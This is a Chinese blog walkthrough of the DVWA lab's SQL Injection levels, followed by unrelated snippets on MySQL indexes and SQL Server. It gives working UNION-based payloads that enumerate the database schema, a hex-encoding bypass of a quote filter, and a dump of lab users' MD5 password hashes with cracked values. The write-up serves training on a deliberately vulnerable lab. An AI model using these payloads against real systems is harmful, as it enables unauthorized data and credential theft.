DVWA靶场通关之SQL Injection

2024-02-22 07:58

本文主要是介绍DVWA靶场通关之SQL Injection,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

SQL Injection

以下ip均为dwva靶场的ip地址,这里我搭建在虚拟机win2008中

一. low
1. 求闭合字符
  • 输入1

image-20210622162312182

 1' and 1=1 #

image-20210622162436124

  • 可能存在单引号sql注入
2. 求列数
1' and 1=1 order by 2# 

image-20210622162828438

1' and 1=1 order by 3# 

image-20210622162910604

  • 说明有两列
3. 求显示位
1' and 1=2 union select 1,2 #

image-20210622163135926

4. 爆数据名
1' and 1=2 union select 1,database() #

image-20210622163331236

  • 数据库名为dvwa

  • 查询一下数据库名

1' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata) #

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hA2XDmLD-1626704824931)(实验三.assets/image-20210622163600637.png)]

5. 爆表名
1' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa') #

image-20210622164112982

  • 判断users表示想要的用户名密码表
6. 爆列名
1' and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users') #

image-20210622164318525

7. 爆字段名
1' and 1=2 union select (select group_concat(user) from dvwa.users),(select group_concat(password) from dvwa.users) #

image-20210622164759984

用户名:admin

密码:5f4dcc3b5aa765d61d8327deb882cf99 解密:password

用户名:gordonb

密码:e99a18c428cb38d5f260853678922e03 解密:abc123

用户名:1337

密码:8d3533d75ae2c3966d7e0d4fcc69216b 解密:charley 等

二. medium

image-20210622171116782

html 锚点,# 表示返回当前页面

image-20210623001254371

  • 想到利用burpsuite修改数据包中的信息

image-20210622171249675

1. 求闭合字符
 id=1 and 1=1 //正确

image-20210622171452490

image-20210622171534360

id=1 and 1=2 //错误

image-20210622171706421

  • 发现是数字型sql注入
2. 求列数
id=1 order by 2

image-20210622172237197

image-20210622172253415

id=1 order by 3

image-20210622172323269
image-20210622172116458

  • 发现有2列
3. 求显示位
id=1 and i=2 union select 1,2

image-20210622172520517

image-20210622172609921

4. 爆数据库名
id=1 and 1=2 union select 1,database()

image-20210622172715392

image-20210622173511398

  • 数据库名为dvwa

  • 查询一下数据库名

id=1 and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata)

image-20210622173741869

image-20210622173818998

  • 有dvwa数据库
5. 爆表名
id=1 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa') //报错,发现单引号被过滤,这里可以使用database()或者转换成16进制ascii码
id=1 and 1=2 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()//正确

image-20210622174103340

image-20210622180556945

6. 爆列名
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273//转换成16进制ascii码 

image-20210622181510099

image-20210622181436874

7. 爆字段名
id=1 and 1=2 union select (select group_concat(user) from dvwa.users),(select group_concat(password) from dvwa.users)

image-20210622181721010

image-20210622181754233

用户名:admin

密码:5f4dcc3b5aa765d61d8327deb882cf99 解密:password

用户名:gordonb

密码:e99a18c428cb38d5f260853678922e03 解密:abc123

用户名:1337

密码:8d3533d75ae2c3966d7e0d4fcc69216b 解密:charley

三. high
1.求闭合字符
id=1'//报错
id=1' and 1=1 #//正确
id=1' and 1=2 #//错误
  • 判断出来是单引号字符型注入
2.求列数
1' and 1=1 order by 2# 

image-20210623090039333

1' and 1=1 order by 3# 

image-20210623090129658

  • 判断是有两列
3. 求显示位
1' and 1=2 union select 1,2 #

image-20210623090335812

4. 爆数据库名
1' and 1=2 union select 1,database() #

image-20210623090637086

  • 数据库名为dvwa
  • 查询一下数据库名
1' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata) #

image-20210623090710377

5. 爆表名
1' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa') #

image-20210623090859329

  • 判断users表示想要的用户名密码表
6.爆列名
1' and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users') #

image-20210623090941068

7. 爆字段名
1' and 1=2 union select (select group_concat(user) from dvwa.users),(select group_concat(password) from dvwa.users) #

image-20210623091021050

用户名:admin

密码:5f4dcc3b5aa765d61d8327deb882cf99 解密:password

用户名:gordonb

密码:e99a18c428cb38d5f260853678922e03 解密:abc123

用户名:1337

密码:8d3533d75ae2c3966d7e0d4fcc69216b 解密:charley 等

这篇关于DVWA靶场通关之SQL Injection的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/734606

相关文章

mysql索引四(组合索引)

单列索引,即一个索引只包含单个列,一个表可以有多个单列索引,但这不是组合索引;组合索引,即一个索引包含多个列。 因为有事,下面内容全部转自:https://www.cnblogs.com/farmer-cabbage/p/5793589.html 为了形象地对比单列索引和组合索引,为表添加多个字段:    CREATE TABLE mytable( ID INT NOT NULL, use

mysql索引三(全文索引)

前面分别介绍了mysql索引一(普通索引)、mysql索引二(唯一索引)。 本文学习mysql全文索引。 全文索引(也称全文检索)是目前搜索引擎使用的一种关键技术。它能够利用【分词技术】等多种算法智能分析出文本文字中关键词的频率和重要性,然后按照一定的算法规则智能地筛选出我们想要的搜索结果。 在MySql中,创建全文索引相对比较简单。例如:我们有一个文章表(article),其中有主键ID(

mysql索引二(唯一索引)

前文中介绍了MySQL中普通索引用法,和没有索引的区别。mysql索引一(普通索引) 下面学习一下唯一索引。 创建唯一索引的目的不是为了提高访问速度,而只是为了避免数据出现重复。唯一索引可以有多个但索引列的值必须唯一,索引列的值允许有空值。如果能确定某个数据列将只包含彼此各不相同的值,在为这个数据列创建索引的时候就应该使用关键字UNIQUE,把它定义为一个唯一索引。 添加数据库唯一索引的几种

mysql索引一(普通索引)

mysql的索引分为两大类,聚簇索引、非聚簇索引。聚簇索引是按照数据存放的物理位置为顺序的,而非聚簇索引则不同。聚簇索引能够提高多行检索的速度、非聚簇索引则对单行检索的速度很快。         在这两大类的索引类型下,还可以降索引分为4个小类型:         1,普通索引:最基本的索引,没有任何限制,是我们经常使用到的索引。         2,唯一索引:与普通索引

【服务器运维】MySQL数据存储至数据盘

查看磁盘及分区 [root@MySQL tmp]# fdisk -lDisk /dev/sda: 21.5 GB, 21474836480 bytes255 heads, 63 sectors/track, 2610 cylindersUnits = cylinders of 16065 * 512 = 8225280 bytesSector size (logical/physical)

Jitter Injection详解

一、定义与作用 Jitter Injection,即抖动注入,是一种在通信系统中人为地添加抖动的技术。该技术通过在发送端对数据包进行延迟和抖动调整,以实现对整个通信系统的时延和抖动的控制。其主要作用包括: 改善传输质量:通过调整数据包的时延和抖动,可以有效地降低误码率,提高数据传输的可靠性。均衡网络负载:通过对不同的数据流进行不同程度的抖动注入,可以实现网络资源的合理分配,提高整体传输效率。增

SQL Server中,查询数据库中有多少个表,以及数据库其余类型数据统计查询

sqlserver查询数据库中有多少个表 sql server 数表:select count(1) from sysobjects where xtype='U'数视图:select count(1) from sysobjects where xtype='V'数存储过程select count(1) from sysobjects where xtype='P' SE

SQL Server中,always on服务器的相关操作

在SQL Server中,建立了always on服务,可用于数据库的同步备份,当数据库出现问题后,always on服务会自动切换主从服务器。 例如192.168.1.10为主服务器,12为从服务器,当主服务器出现问题后,always on自动将主服务器切换为12,保证数据库正常访问。 对于always on服务器有如下操作: 1、切换主从服务器:假如需要手动切换主从服务器时(如果两个服务

SQL Server中,isnull()函数以及null的用法

SQL Serve中的isnull()函数:          isnull(value1,value2)         1、value1与value2的数据类型必须一致。         2、如果value1的值不为null,结果返回value1。         3、如果value1为null,结果返回vaule2的值。vaule2是你设定的值。        如

SQL Server中,添加数据库到AlwaysOn高可用性组条件

1、将数据添加到AlwaysOn高可用性组,需要满足以下条件: 2、更多具体AlwaysOn设置,参考:https://msdn.microsoft.com/zh-cn/library/windows/apps/ff878487(v=sql.120).aspx 注:上述资源来自MSDN。